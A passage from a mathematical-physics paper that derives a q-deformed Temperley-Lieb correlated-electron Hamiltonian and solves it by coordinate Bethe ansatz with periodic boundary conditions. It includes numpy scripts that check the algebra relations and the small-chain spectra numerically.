electron system associated with the TL algebra. In section 3 we find
through the coordinate Bethe ansatz the
spectra of the model with usual periodic boundary conditions. In
section 4 the Bethe ansatz solution is presented for closed
boundary conditions. A summary of our main results is presented
in section 5.
\section{The Model}
The starting point for building the model is a 4-dimensional module V of the
Lie superalgebra $U_q(g\ell (2/1))$ utilized to obtain a representation of
the TL algebra. Let $\{|x \rangle \}^4_{x=1}$ be an orthonormal basis of
V
which carries the following parity,
\begin{equation}
[|1\rangle ]=[|4\rangle ]=0 \ \ \ \ \ [|2\rangle ]=[|3\rangle ]=1 .
\end{equation}
Everywhere we shall use the graded-tensor product law, defined by,
\[
(a\otimes b)(c\otimes d)=(-1)^{[b][c]} \ \ (ac\otimes bd)
\]
and also the rule,
\[
(|x\rangle \otimes |y\rangle )^{\dagger} ={(-1)^{[|x\rangle] [|y\rangle]
}}
\langle x|{\otimes} \langle y| .
\]
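These sign rules can be checked mechanically. One matrix convention compatible with them (an assumption of ours, used only for illustration) is $(A\otimes B)_{(ik),(jl)} = (-1)^{[B]\,p_j} A_{ij} B_{kl}$ for homogeneous operators, where $p_j$ is the parity of the $j$-th basis vector; with it the graded product law can be verified numerically:

```python
# Illustrative consistency check (ours, not from the paper).  With the
# matrix convention (A x B)_{(ik),(jl)} = (-1)^{[B] p_j} A_{ij} B_{kl}
# for homogeneous operators, the graded product law
# (A x B)(C x D) = (-1)^{[B][C]} (AC x BD) holds.
import numpy as np

p = np.array([0, 1, 1, 0])                  # parities of |1>,...,|4>

def homogeneous(par, rng):
    """Random 4x4 matrix of parity par: A_ij != 0 only if p_i + p_j = par mod 2."""
    return rng.standard_normal((4, 4))*((p[:, None] + p[None, :]) % 2 == par)

def gkron(A, B, parB):
    """Graded tensor product of homogeneous operators A and B."""
    sign = (-1.0)**(parB*p)                 # (-1)^{[B] p_j}, applied column-wise
    return np.kron(A*sign[None, :], B)

rng = np.random.default_rng(3)
for pa in (0, 1):
    for pb in (0, 1):
        for pc in (0, 1):
            for pd in (0, 1):
                A, B = homogeneous(pa, rng), homogeneous(pb, rng)
                C, D = homogeneous(pc, rng), homogeneous(pd, rng)
                lhs = gkron(A, B, pb) @ gkron(C, D, pd)
                rhs = (-1)**(pb*pc)*gkron(A @ C, B @ D, (pb + pd) % 2)
                assert np.allclose(lhs, rhs)
```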
It is then possible to construct the following unnormalized vector of $V
\otimes V$
\begin{eqnarray}
\left| \Psi \right\rangle &=&q^{-1/2}\left| 4\right\rangle \otimes \left|
1\right\rangle +q^{1/2}\left| 1\right\rangle \otimes \left| 4\right\rangle
+q^{-1/2}\left| 3\right\rangle \otimes \left| 2\right\rangle -q^{1/2}\left|
2\right\rangle \otimes \left| 3\right\rangle \nonumber \\
\left\langle \Psi \right| &=&q^{-1/2}\left\langle 4\right| \otimes
\left\langle 1\right| +q^{1/2}\left\langle 1\right| \otimes \left\langle
4\right| +q^{-1/2}\left\langle 3\right| \otimes \left\langle 2\right|
-q^{1/2}\left\langle 2\right| \otimes \left\langle 3\right| \nonumber \\
&& \label{eq0.1}
\end{eqnarray}
Next, to arrive at a hermitian Hamiltonian we consider the operator
\[
T=\left| \Psi \right\rangle \left\langle \Psi \right|
\]
A straightforward calculation shows that
\begin{eqnarray}
T^2 = [2(q &+& q^{-1})]T \nonumber \\
(T\otimes I)(I\otimes T)(T\otimes I) &=& T\otimes I \\
(I\otimes T)(T\otimes I)(I\otimes T) &=& I\otimes T \ , \nonumber
\end{eqnarray}
such that $T$ provides a representation of the $TL$ algebra.
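The Temperley-Lieb relations can also be verified numerically. Treating $T$ as a plain $16\times 16$ matrix in the ordered basis $|x\rangle \otimes |y\rangle$, and assuming (as this check of ours does) that the graded signs are carried entirely by the explicit coefficients of $|\Psi\rangle$ and $\langle\Psi|$ quoted above, one finds:

```python
# Numerical check (ours).  We treat T = |Psi><Psi| as a plain 16x16
# matrix in the ordered basis |x> x |y>, assuming the graded signs are
# carried entirely by the explicit coefficients of |Psi> and <Psi| above.
import numpy as np

q = 1.3
idx = lambda x, y: 4*(x - 1) + (y - 1)
psi = np.zeros(16)
psi[idx(4, 1)] = q**-0.5
psi[idx(1, 4)] = q**0.5
psi[idx(3, 2)] = q**-0.5
psi[idx(2, 3)] = -q**0.5

T = np.outer(psi, psi)
I4 = np.eye(4)
T1, T2 = np.kron(T, I4), np.kron(I4, T)

assert np.allclose(T @ T, 2*(q + 1/q)*T)   # T^2 = [2(q + q^{-1})] T
assert np.allclose(T1 @ T2 @ T1, T1)       # (T x 1)(1 x T)(T x 1) = T x 1
assert np.allclose(T2 @ T1 @ T2, T2)       # (1 x T)(T x 1)(1 x T) = 1 x T
```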
Following the approach of ref. \cite{batch1} to obtain solutions of
the Yang-Baxter equation through the TL algebra, a
local Hamiltonian can be defined by
(see ref. \cite{cinco} for more details).
\begin{equation}
H_{i,i+1}=T_{i,i+1},
\end{equation}
where on the N-fold tensor product space we denoted
\begin{equation}
T_{i,i+1}=I^{\otimes (i-1)}\otimes T\otimes I^{\otimes (N-i-1)}.
\end{equation}
In view of the grading the basis vectors of the module $V$ can
be identified with the electronic states as follows
\[
|1\rangle \equiv |+-\rangle = c^+_+c^+_-|0\rangle \ ,
\ |2\rangle \equiv |-\rangle =c^+_-|0\rangle \ , \
|3\rangle \equiv |+\rangle = c^+_+|0\rangle \ ,
\ |4\rangle \equiv | 0\rangle
\]
allowing $H_{i,i+1}$ to be expressed as
\begin{eqnarray}
H_{i,i+1} &=& qn_{i,+}n_{i,-}(1-n_{i+1,+})
(1-n_{i+1,-})+q^{-1}(1-n_{i,+})(1-n_{i,-})n_{i+1,+}n_{i+1,-}
\nonumber \\
&+& q^{-1}n_{i,+}(1-n_{i,-})n_{i+1,-}(1-n_{i+1,+})+
qn_{i,-}(1-n_{i,+})n_{i+1,+}(1-n_{i+1,-})\nonumber \\
&-& S^+_iS^-_{i+1}-S^-_iS^+_{i+1}+
c^+_{i,+}c^+_{i,-}c_{i+1,-}c_{i+1,+}+
c^+_{i+1,+}c^+_{i+1,-}c_{i,-}c_{i,+}
\\
&+&qc^+_{i,+}c_{i+1,+}n_{i,-}(1-n_{i+1,-}) + h.c.
-c^+_{i,-}c_{i+1,-}n_{i,+}(1-n_{i+1,+}) + h.c.
\nonumber \\
&+& c_{i,-}c^+_{i+1,-}n_{i+1,+}(1-n_{i,+}) + h.c.
-q^{-1} c_{i,+}c^+_{i+1,+}n_{i+1,-}(1-n_{i,-})+h.c.\nonumber
\end{eqnarray}
where the $c^{(+)}_{i\pm}$ are spin-up or spin-down annihilation (creation)
operators, the $S_i$'s spin matrices and the $n_i$'s occupation
numbers of electrons at lattice site $i$.
This model describes electron pair hopping,
correlated hopping and generalized spin interactions. In the
limit $q\rightarrow 1$ it reduces to the isotropic Hamiltonian
introduced by Links in \cite{quatro}, which was shown to be
invariant with respect to $ gl(2) \otimes u(1)$.
The global Hamiltonian is given by
\begin{equation}
H=\sum_{k=1}^{N-1} \, H_{k,k+1} \, \, \, + \, \, \, b.t. \label{eq1.1}
\end{equation}
where $b.t.$ denotes the boundary term. The usual imposition of
periodic boundary conditions (PBC), i.e., $b.t. = H_{N,1}$, has
the effect of breaking the $U_q(gl(2))\otimes u(1)$ symmetry of the
model, since $H_{N,1} \neq H_{1,N}$, reflecting the non-cocommutativity
of the co-product. However, it was shown in \cite{cinco}
following \cite{{martin},{KZ},{grosse},{foercb}} that for a special choice
of the boundary term it is in fact possible to recover
a quantum algebra invariant Hamiltonian which is in addition
periodic in a certain sense. We shall call this type of boundary
condition closed (CBC) and denote it by $b.t. = {\cal U}_{0}$
(see section 4 for details).
In the next sections we will find the spectrum of this Hamiltonian
for these two types of boundaries (PBC and CBC) through a modified
version of the coordinate Bethe ansatz.
\section{Bethe ansatz solution for periodic boundary conditions}
The case with periodic boundary conditions described by the Hamiltonian
\begin{equation}
H=\sum_{k=1}^{N} \, T_{k,k+1}, \label{eqpbc}
\end{equation}
can be mapped into a quantum spin
chain of $N$ sites each with spin $3/2$. To verify this we notice that
the local Hamiltonian can be rewritten as
\[
T=\left| \Psi \right\rangle \left\langle \Psi \right| =\left(
\begin{array}{ll}
U & 0_{4\times 12} \\
0_{12\times 4} & 0_{12\times 12}
\end{array}
\right)
\]
where
\begin{equation}
U=
\begin{array}{l}
\left\langle 14\right| \\
\left\langle 23\right| \\
\left\langle 32\right| \\
\left\langle 41\right|
\end{array}
\left(
\begin{array}{c}
\begin{array}{llll}
\left| 14\right\rangle &
\left| 23\right\rangle &
\left| 32\right\rangle &
\left| 41\right\rangle
\end{array}
\\
\!\!\!\!
\begin{array}{llll}
q \, \, \, & -q \, \, \, \, \, \, & \, \, \, 1 \, \,\,\, \, \, & \, \, \, 1 \\
-q & \, \, \, q\, & -1\, & -1 \\
1 & -1 & q^{-1} & q^{-1} \\
1 & -1 & q^{-1} & q^{-1}
\end{array}
\end{array}
\right) \label{eq0.2}
\end{equation}
and the following correspondence has to be understood
\begin{equation}
\left| 1\right\rangle =\left(
\begin{array}{l}
1 \\
0 \\
0 \\
0
\end{array}
\right) ,\left| 2\right\rangle =\left(
\begin{array}{l}
0 \\
1 \\
0 \\
0
\end{array}
\right) ,\left| 3\right\rangle =\left(
\begin{array}{l}
0 \\
0 \\
1 \\
0
\end{array}
\right) ,\left| 4\right\rangle =\left(
\begin{array}{l}
0 \\
0 \\
0 \\
1
\end{array}
\right) , \label{eq1.2}
\end{equation}
The spin values are given by the eigenvalues of the operator $S^{z}$%
\[
S^{z}=\left(
\begin{array}{llll}
3/2 & & & \\
& 1/2 & & \\
& & -1/2 & \\
& & & -3/2
\end{array}
\right)
\]
and the total spin operator commuting with H is $S_{T}^{z}$
\begin{equation}
S_{T}^{z}=\sum_{k=1}^{N}{I^{\otimes (k-1)}}\otimes S^{z}\otimes
{I^{\otimes (N-k)}}.
\end{equation}
Following \cite{sete} the spectrum of the above Hamiltonian can be
classified in sectors which are defined by the eigenvalues of the number
operator
\begin{equation}
r=\frac{3}{2}N-S_{T}^{z} \label{eq1.3}
\end{equation}
Let us now start to diagonalize $H$ in every sector, i.e.,
\[
H\Psi =E\Psi
\]
In the first sectors $r=0, 1, 2$ the eigenstates do not move under
the action of $H$, i.e., $H\Psi_{r=0, 1, 2} = 0$. For this
reason they are called impurities \cite{rol}.
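These statements can be confirmed by brute force on a small chain. The sketch below is our own check (it is not part of the original text): it builds the periodic Hamiltonian for $N=4$ from the $16\times 16$ matrix $T$ of (\ref{eq0.2}), using a hypothetical helper \texttt{embed\_pair} that places a two-site operator on an arbitrary pair of sites, and verifies that $S_{T}^{z}$ is conserved and that states in the sectors $r=0,1,2$ are annihilated.

```python
import numpy as np

q, d, N = 1.3, 4, 4                    # illustrative values

c = np.zeros(d*d)                      # |Psi> of eq. (eq0.1) as a plain vector
c[3*d+0], c[0*d+3], c[2*d+1], c[1*d+2] = q**-0.5, q**0.5, q**-0.5, -q**0.5
T = np.outer(c, c)

def embed_pair(op2, i, j, N, d=4):
    """op2 (d^2 x d^2) acting on sites i and j (0-based), identity elsewhere."""
    dim = d**N
    M = np.zeros((dim, dim))
    for col in range(dim):
        dig = [(col // d**(N-1-t)) % d for t in range(N)]
        colpair = dig[i]*d + dig[j]
        for rowpair in range(d*d):
            if op2[rowpair, colpair] != 0.0:
                new = list(dig)
                new[i], new[j] = rowpair // d, rowpair % d
                row = 0
                for t in new:
                    row = row*d + t
                M[row, col] += op2[rowpair, colpair]
    return M

H = sum(embed_pair(T, k, (k+1) % N, N) for k in range(N))   # PBC chain

sz = np.diag([1.5, 0.5, -0.5, -1.5])
Sz = sum(np.kron(np.kron(np.eye(d**i), sz), np.eye(d**(N-1-i)))
         for i in range(N))
assert np.allclose(H @ Sz, Sz @ H)      # [H, S^z_T] = 0: sectors are well defined

def basis(digits):
    # basis state |x_1 ... x_N>, digits 0..3 standing for |1>..|4>
    idx = 0
    for t in digits:
        idx = idx*d + t
    e = np.zeros(d**N)
    e[idx] = 1.0
    return e

assert np.allclose(H @ basis([0, 0, 0, 0]), 0)   # r=0: all spins 3/2
assert np.allclose(H @ basis([0, 1, 0, 0]), 0)   # r=1: one impurity of type 1/2
assert np.allclose(H @ basis([0, 1, 0, 1]), 0)   # r=2: two impurities
```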
In sector $r=3$, we
encounter the situation where the states $\left| \alpha ,k\right\rangle $
and $\left| -\alpha ,k\pm 1\right\rangle $, $\alpha \in S^z=\{\frac{-3}{2},%
\frac{-1}{2},\frac{1}{2},\frac{3}{2}\}$, occur in neighboring pairs. They
move under the action of $H$, {\it i.e.,} the sector $r=3$ contains one
free
{\em pseudoparticle}. In general, for a sector $r$ we may have $p$
pseudoparticles and $N_{\frac{1}{2}}$ and $N_{\frac{-1}{2}}$ impurities of
the types $\frac{1}{2}$ and $\frac{-1}{2}$, respectively, such that
\begin{equation}
r=3p+N_{\frac{1}{2}}+2N_{\frac{-1}{2}} \label{pba1}
\end{equation}
For the first nontrivial sector $r=3$, the corresponding eigenspace is spanned
by the states $\left| k(-\alpha ,\alpha )\right\rangle =\left| \frac{3}{2}\
\frac{3}{2}\cdots \frac{3}{2}\ {-\alpha }\ \alpha \ \frac{3}{2}\cdots
\frac{3}{2}\right\rangle $, where $k=1,2,\ldots ,N-1$ and $\alpha \in S^z$.
We seek eigenstates of
$H$ which are linear combinations of these vectors. It is very convenient to
consider the linear combination
\begin{equation}
\left| \Omega (k)\right\rangle =\left| k(\frac{-3}{2},\frac{3}{2}
)\right\rangle +\left| k(\frac{-1}{2},\frac{1}{2})\right\rangle -q\left| k(%
\frac{1}{2},\frac{-1}{2})\right\rangle +q\left| k(\frac{3}{2},\frac{-3}{2}%
)\right\rangle \label{pba2}
\end{equation}
which is an eigenstate of $U_{k}$ \footnote{ From now on we will adopt the
convention that $ U_{k} \equiv U_{k,k+1} $ operates in a direct product
of complex spaces at positions $k$ and $k+1$}
\begin{equation}
U_{k}\left| \Omega (k)\right\rangle =(Q+Q^{-1})\left| \Omega
(k)\right\rangle =2(q+q^{-1})\left| \Omega (k)\right\rangle \text{.}
\label{pba3}
\end{equation}
and also a highest weight state, i.e., $ S^+ \Psi = 0$.
Moreover, the action of $U_{k\pm 1}$ on $\left| \Omega (k)\right\rangle $ is
very simple
\begin{equation}
\begin{array}{lll}
U_{k\pm 1}\left| \Omega (k)\right\rangle =\left| \Omega (k\pm
1)\right\rangle & & U_{k}\left| \Omega (k\pm 1)\right\rangle =\left|
\Omega (k)\right\rangle \\
& & \\
U_{k}\left| \Omega (m)\right\rangle =0 & & k\neq \{m\pm 1,m\}
\end{array}
\label{pba4}
\end{equation}
It should be emphasized that the linear combination (\ref{pba2}) affords a
considerable simplification in the diagonalization of $H$ in comparison
with the traditional calculation employing the usual spin basis \cite{sete}.
In fact, we believe that this type of ansatz is quite general and could
be applied to solve a larger class of Hamiltonians derived from
representations of the TL algebra.
We will now start to diagonalize $H$ in the sector $r=3$. Let us consider
the non-trivial case of one
free pseudoparticle
\begin{equation}
\Psi _{3}=\sum_{k}A(k)\left| \Omega (k)\right\rangle . \label{pba5}
\end{equation}
Using the eigenvalue equation $H\Psi _{3}=E_{3}\Psi _{3}$, one
can derive a complete set of equations for the wavefunctions $A(k)$.
When the bulk of $H$ acts on $\left| \Omega (k)\right\rangle $ it sees the
reference configuration, except in the vicinity of $k$ where we use (\ref
{pba3}) and (\ref{pba4}) to get the following eigenvalue equation
\begin{eqnarray}
(E_{3}-Q-Q^{-1})A(k) &=&A(k-1)+A(k+1) \nonumber \\
2 &\leq &k\leq N-2 \label{pba7}
\end{eqnarray}
Here we will treat periodic boundary conditions. They demand $%
U_{N,N+1}=U_{N,1}$, implying $A(k+N)=A(k)$. This permits us to complete
the
set of equations (\ref{pba7}) for $A(k)$ by including the equations for $k=1$
and $k=N-1$. Now we parametrize $A(k)$ by plane wave $A(k)=A\xi ^{k}$ to
get
the energy of one free pseudoparticle as:
\begin{eqnarray}
E_{3} &=&2(q+q^{-1})+\xi +\xi ^{-1} \nonumber \\
\xi ^{N} &=&1 \label{pba8}
\end{eqnarray}
Here $\xi ={\rm e}^{i\theta }$, $\theta $ being the momentum determined from
the periodic boundary condition to be $\theta =2\pi l/N$, with $l$ an integer.
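For a small chain this prediction can be checked against exact diagonalization. The sketch below is our own check ($q=1.3$ and $N=4$ are arbitrary choices; the matrix $T$ and the helper \texttt{embed\_pair} are as in the earlier sketch), confirming that every level $E_{3}=2(q+q^{-1})+2\cos (2\pi l/N)$ occurs in the spectrum.

```python
import numpy as np

q, d, N = 1.3, 4, 4                    # illustrative values

c = np.zeros(d*d)
c[3*d+0], c[0*d+3], c[2*d+1], c[1*d+2] = q**-0.5, q**0.5, q**-0.5, -q**0.5
T = np.outer(c, c)

def embed_pair(op2, i, j, N, d=4):
    # two-site operator op2 on sites i, j (0-based), identity elsewhere
    dim = d**N
    M = np.zeros((dim, dim))
    for col in range(dim):
        dig = [(col // d**(N-1-t)) % d for t in range(N)]
        colpair = dig[i]*d + dig[j]
        for rowpair in range(d*d):
            if op2[rowpair, colpair] != 0.0:
                new = list(dig)
                new[i], new[j] = rowpair // d, rowpair % d
                row = 0
                for t in new:
                    row = row*d + t
                M[row, col] += op2[rowpair, colpair]
    return M

H = sum(embed_pair(T, k, (k+1) % N, N) for k in range(N))
evals = np.linalg.eigvalsh(H)          # H is real symmetric here

for l in range(N):                     # xi = exp(2 pi i l / N), xi^N = 1
    E3 = 2*(q + 1/q) + 2*np.cos(2*np.pi*l/N)
    assert np.min(np.abs(evals - E3)) < 1e-8
print("all one-pseudoparticle levels found")
```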
Let us consider the state with one pseudoparticle and one impurity of type $%
\frac{1}{2}$, which lies in the sector $r=4$. We seek eigenstates in the form
\begin{equation}
\Psi _{4}(\xi _{1},\xi _{2})=\sum_{k_{1}<k_{2}}\left\{
A_{1}(k_{1},k_{2})\left| \Omega _{1}(k_{1},k_{2})\right\rangle
+A_{2}(k_{1},k_{2})\left| \Omega _{2}(k_{1},k_{2})\right\rangle \right\}
\label{pba9}
\end{equation}
We try to build these eigenstates out of translationally invariant products
of one pseudoparticle excitation with parameter $\xi _{2}$ and one impurity
with parameter $\xi _{1}$:
\begin{equation}
\Psi _{4}(\xi _{1},\xi _{2})=\left| \frac{1}{2}(\xi _{1})\right\rangle
\times \Psi _{3}(\xi _{2})+\Psi _{3}(\xi _{2})\times \left| \frac{1}{2}(\xi
_{1})\right\rangle \label{pba9a}
\end{equation}
Using one-pseudoparticle eigenstate solution (\ref{pba5}) and comparing this
with (\ref{pba9}) we get
\begin{eqnarray}
\left| \Omega _{1}(k_{1},k_{2})\right\rangle &=&\left| k_{1}(\frac{1}{2}%
),k_{2}(\frac{-3}{2},\frac{3}{2})\right\rangle +\left| k_{1}(\frac{1}{2}%
),k_{2}(\frac{-1}{2},\frac{1}{2})\right\rangle \nonumber \\
&&-q\left| k_{1}(\frac{1}{2}),k_{2}(\frac{1}{2},\frac{-1}{2})\right\rangle
+q\left| k_{1}(\frac{1}{2}),k_{2}(\frac{3}{2},\frac{-3}{2})\right\rangle
\nonumber \\
&& \nonumber \\
\left| \Omega _{2}(k_{1},k_{2})\right\rangle &=&\left| k_{1}(\frac{-3}{2},%
\frac{3}{2}),k_{2}(\frac{1}{2})\right\rangle +\left| k_{1}(\frac{-1}{2},%
\frac{1}{2}),k_{2}(\frac{1}{2})\right\rangle \nonumber \\
&&-q\left| k_{1}(\frac{1}{2},\frac{-1}{2}),k_{2}(\frac{1}{2})\right\rangle
+q\left| k_{1}(\frac{3}{2},\frac{-3}{2}),k_{2}(\frac{1}{2})\right\rangle
\nonumber \\
&& \label{pba10}
\end{eqnarray}
and
\begin{equation}
A_{1}(k_{1},k_{2})=A_{1}\xi _{1}^{k_{1}}\xi _{2}^{k_{2}}\qquad ,\qquad
A_{2}(k_{1},k_{2})=A_{2}\xi _{2}^{k_{1}}\xi _{1}^{k_{2}}. \label{pba12}
\end{equation}
Periodic boundary conditions $A_{1}(k_{2},N+k_{1})=A_{2}(k_{1},k_{2})$ and $%
A_{i}(N+k_{1},N+k_{2})=A_{i}(k_{1},k_{2})$,\quad $i=1,2$ imply that
\begin{equation}
A_{1}\xi _{2}^{N}=A_{2}\quad ,\quad \xi ^{N}=(\xi _{1}\xi _{2})^{N}=1\
\label{pba13}
\end{equation}
When $H$ now acts on $\Psi _{4}$, we will get a set of coupled equations for
$A_{i}(k_{1},k_{2}),$ $i=1,2$. We split the equations into {\em far}
equations, when the pseudoparticle do not meet the impurity and {\em near}
equations, containing terms when they are neighbors.
Since the impurity is annihilated by $H$, the action of $H$ on (\ref{pba9})
in the case {\em far} ({\it i.e}., $(k_{2}-k_{1})\geq 3$), can be written down
directly from (\ref{pba7}) :
\begin{equation}
\left( E_{4}-Q-Q^{-1}\right)
A_{1}(k_{1},k_{2})=A_{1}(k_{1},k_{2}-1)+A_{1}(k_{1},k_{2}+1) \label{pba15}
\end{equation}
and similar equations for $A_{2}(k_{1},k_{2})$. Using the parametrization (%
\ref{pba12}), these equations will give us the energy eigenvalues
\begin{equation}
E_{4}=Q+Q^{-1}+\xi _{2}+\xi _{2}^{-1} \label{pba16}
\end{equation}
To find $\xi _{2}$ we must consider the{\em \ near} equations. First, we
compute the action of $H$ on the coupled {\em near} states $\left| \Omega
_{1}(k,k+1)\right\rangle $ and $\left| \Omega _{2}(k,k+2)\right\rangle $:
\begin{eqnarray}
H\left| \Omega _{1}(k,k+1)\right\rangle &=&(Q+Q^{-1})\left| \Omega
_{1}(k,k+1)\right\rangle +\left| \Omega _{1}(k,k+2)\right\rangle -\left|
\Omega _{2}(k,k+2)\right\rangle \nonumber \\
&& \label{pba17}
\end{eqnarray}
The last term in this equation tells us that a pseudoparticle can
propagate past the isolated impurity, but in doing so causes a shift in its
position by two lattice sites. Substituting (\ref{pba17}) into the eigenvalue
equation, we get
\begin{equation}
\left( E_{4}-Q-Q^{-1}\right) A_{1}(k,k+1)=A_{1}(k,k+2)-A_{2}(k,k+2)
\label{pba20}
\end{equation}
These equations, which are not automatically satisfied by the ansatz (\ref
{pba12}), are equivalent to the conditions
\begin{equation}
A_{1}(k,k) = -A_{2}(k,k+2)\qquad \label{pba21}
\end{equation}
obtained by subtracting Eq. (\ref{pba20}) from Eq.(\ref{pba15}) for $k_{1}=k$
$,$ $k_{2}=k+1$. The conditions (\ref{pba21}) require a modification of the
amplitude relation (\ref{pba13}):
\begin{equation}
\frac{A_{2}}{A_{1}}=-\xi _{1}^{-2}=\xi _{2}^{N}\Rightarrow \xi _{2}^{N}\xi
_{1}^{2}=-1\qquad \text{{\rm or}\qquad }\xi _{2}^{N-2}\xi ^{2}=-1
\label{pba22}
\end{equation}
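Since $\xi ^{N}=1$ and $\xi _{2}^{N}\xi _{1}^{2}=-1$ imply $\xi _{1}^{N-2}=-1$, both parameters can be enumerated explicitly and the resulting levels $E_{4}$ of (\ref{pba16}) compared with exact diagonalization. The sketch below is our own check ($q=1.3$, $N=5$ arbitrary; matrix $T$ and helper \texttt{embed\_pair} as in the earlier sketches).

```python
import numpy as np

q, d, N = 1.3, 4, 5                    # illustrative values

c = np.zeros(d*d)
c[3*d+0], c[0*d+3], c[2*d+1], c[1*d+2] = q**-0.5, q**0.5, q**-0.5, -q**0.5
T = np.outer(c, c)

def embed_pair(op2, i, j, N, d=4):
    # two-site operator op2 on sites i, j (0-based), identity elsewhere
    dim = d**N
    M = np.zeros((dim, dim))
    for col in range(dim):
        dig = [(col // d**(N-1-t)) % d for t in range(N)]
        colpair = dig[i]*d + dig[j]
        for rowpair in range(d*d):
            if op2[rowpair, colpair] != 0.0:
                new = list(dig)
                new[i], new[j] = rowpair // d, rowpair % d
                row = 0
                for t in new:
                    row = row*d + t
                M[row, col] += op2[rowpair, colpair]
    return M

H = sum(embed_pair(T, k, (k+1) % N, N) for k in range(N))
evals = np.linalg.eigvalsh(H)

# xi^N = 1 and xi_2^N xi_1^2 = -1 give xi_1^{N-2} = -1, xi_2^N = -xi_1^{-2}
for a in range(N - 2):
    phi1 = np.pi*(2*a + 1)/(N - 2)         # xi_1 = exp(i phi1)
    for b in range(N):
        th2 = (np.pi - 2*phi1 + 2*np.pi*b)/N   # xi_2 = exp(i th2)
        E4 = 2*(q + 1/q) + 2*np.cos(th2)
        assert np.min(np.abs(evals - E4)) < 1e-8
print("all impurity-pseudoparticle levels of the sector r=4 found")
```

The number of solutions, $(N-2)\times N$, matches the number of configurations of one impurity and one pseudoparticle on the ring.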
In the sectors $3<r<6$ we will also find states which consist of one
pseudoparticle with parameter $\xi _{r-2}$ interacting with $r-3$
impurities, distributed according to (\ref{pba1}), with parameters $\xi
_{i},i=1,2...,r-3$.
The energy of these states is parametrized as in (\ref{pba16}) and $\xi
_{r-2}$ satisfies the condition (\ref{pba22}) with $\xi =\xi _{1}\cdots \xi
_{r-3}\ \xi _{r-2}$. It involves only $\xi _{r-2}$ and $\xi _{{\rm imp}}=\xi
_{1}\ \xi _{2}\cdots \xi _{r-3}$, being therefore highly degenerate, {\it %
i.e.}
\begin{equation}
\xi _{r-2}^{N}\xi _{1}^{2}\ \xi _{2}^{2}\cdots \xi _{r-3}^{2}=(-1)^{r-3}
\label{pba24}
\end{equation}
This is to be expected due to the irrelevance of the relative distances, up
to jumps of two positions via exchange with a pseudoparticle. Moreover,
these results do not depend on the impurity type.
The sector $r=6$ contains, in addition to the cases discussed above, states
which consist of two interacting pseudoparticles. We seek eigenstates in the
form
\begin{equation}
\Psi _{6}(\xi _{1},\xi _{2})=\sum_{k_{1}+1<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle \label{pba25}
\end{equation}
Applying $H$ to the state of (\ref{pba25}), we obtain a set of equations for
the wavefunctions $A(k_{1},k_{2})$. When the two pseudoparticles are
separated, ($k_{2}-k_{1}\geq 3$) these are the following {\em far}
equations:
\begin{equation}
\begin{array}{lll}
\left( E_{6}-2Q-2Q^{-1}\right) A(k_{1},k_{2}) & = &
A(k_{1}-1,k_{2})+A(k_{1}+1,k_{2}) \\
& & \\
& + & A(k_{1},k_{2}-1)+A(k_{1},k_{2}+1)
\end{array}
\label{pba30}
\end{equation}
These equations are satisfied if we parametrize $A(k_{1},k_{2})$ by a
superposition of plane waves, $A(k_{1},k_{2})=A_{12}\,\xi _{1}^{k_{1}}\xi
_{2}^{k_{2}}+A_{21}\,\xi _{2}^{k_{1}}\xi _{1}^{k_{2}}$ (cf. (\ref{pba12})).
The corresponding energy eigenvalue is
\begin{equation}
E_{6}=2Q+2Q^{-1}+\xi _{1}+\xi _{1}^{-1}+\xi _{2}+\xi _{2}^{-1} \label{pbfa31}
\end{equation}
The real problem arises, of course, when the pseudoparticles are neighbors,
so that they interact and we have no guarantee that the total energy is a sum
of single-pseudoparticle energies.
Acting with $H$ on the state $\left| \Omega (k,k+2)\right\rangle $ gives the
following set of equations for the {\em near} states
\begin{equation}
\begin{array}{lll}
H\left| \Omega (k,k+2)\right\rangle & = & 2\left( Q+Q^{-1}\right) \left|
\Omega (k,k+2)\right\rangle +\left| \Omega (k-1,k+2)\right\rangle \\
& & \\
& + & \left| \Omega (k,k+3)\right\rangle +U_{k+1}\left| \Omega
(k,k+2)\right\rangle
\end{array}
\label{pba32}
\end{equation}
Before we substitute this result into the eigenvalue equation, we observe
that some new states are appearing. In order to incorporate these new states
in the eigenvalue problem, we define
\begin{equation}
U_{k+1}\left| \Omega (k,k+2)\right\rangle = \left| \Omega
(k,k+1)\right\rangle +\left| \Omega (k+1,k+2)\right\rangle \label{pba33}
\end{equation}
Here we underline that we are using the same notation for these new states.
Applying $H$ to them we obtain
\begin{equation}
\begin{array}{lll}
H\left| \Omega (k,k+1)\right\rangle & = & \left( Q+Q^{-1}\right) \left|
\Omega (k,k+1)\right\rangle +\left| \Omega (k-1,k+1)\right\rangle \\
& & \\
& + & \left| \Omega (k,k+2)\right\rangle
\end{array}
\label{pba34}
\end{equation}
Now, we extend (\ref{pba25}), the definition of $\Psi _{6}$ , to
\begin{equation}
\Psi _{6}(\xi _{1},\xi _{2})=\sum_{k_{1}<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle \label{pba35}
\end{equation}
Substituting (\ref{pba32}) and (\ref{pba34}) into the eigenvalue equation,
we obtain the following set of {\em near} equations
\begin{equation}
\left( E_{6}-Q-Q^{-1}\right) A(k,k+1)=A(k-1,k+1)+A(k,k+2) \label{pba36}
\end{equation}
Using the same plane wave parametrization for these new wavefunctions, the
equation (\ref{pba36}) gives us the {\em phase shift} produced by the
interchange of the two interacting pseudoparticles
\begin{equation}
\frac{A_{21}}{A_{12}}=-\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi +(Q+Q^{-1})\xi
_{1}} \label{pba37}
\end{equation}
We thus arrive at the Bethe ansatz equations (BAE) which fix the values of $\xi
_{1}$ and $\xi _{2}$ in the energy equation (\ref{pbfa31})
\begin{eqnarray}
\xi _{2}^{N} &=&-\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi +(Q+Q^{-1})\xi _{1}}
\nonumber \\
\xi ^{N} &=&(\xi _{1}\xi _{2})^{N}=1 \label{pba38}
\end{eqnarray}
In a generic sector $r$ with $l$ impurities parametrized by $\xi _{1}\xi
_{2}\cdots \xi _{l}$ and $p$ pseudoparticles with parameters $\xi _{l+1}\xi
_{l+2}\cdots \xi _{l+p}$, the energy is
\begin{equation}
E_{r}=\sum_{n=l+1}^{p}\left\{ Q+Q^{-1}+\xi _{n}+\xi _{n}^{-1}\right\}
\label{pba59}
\end{equation}
with $\xi _{n}$ determined by the Bethe ansatz equations
\begin{eqnarray}
\xi _{a}^{N}\xi _{1}^{2}\xi _{2}^{2}\cdots \xi _{l}^{2}
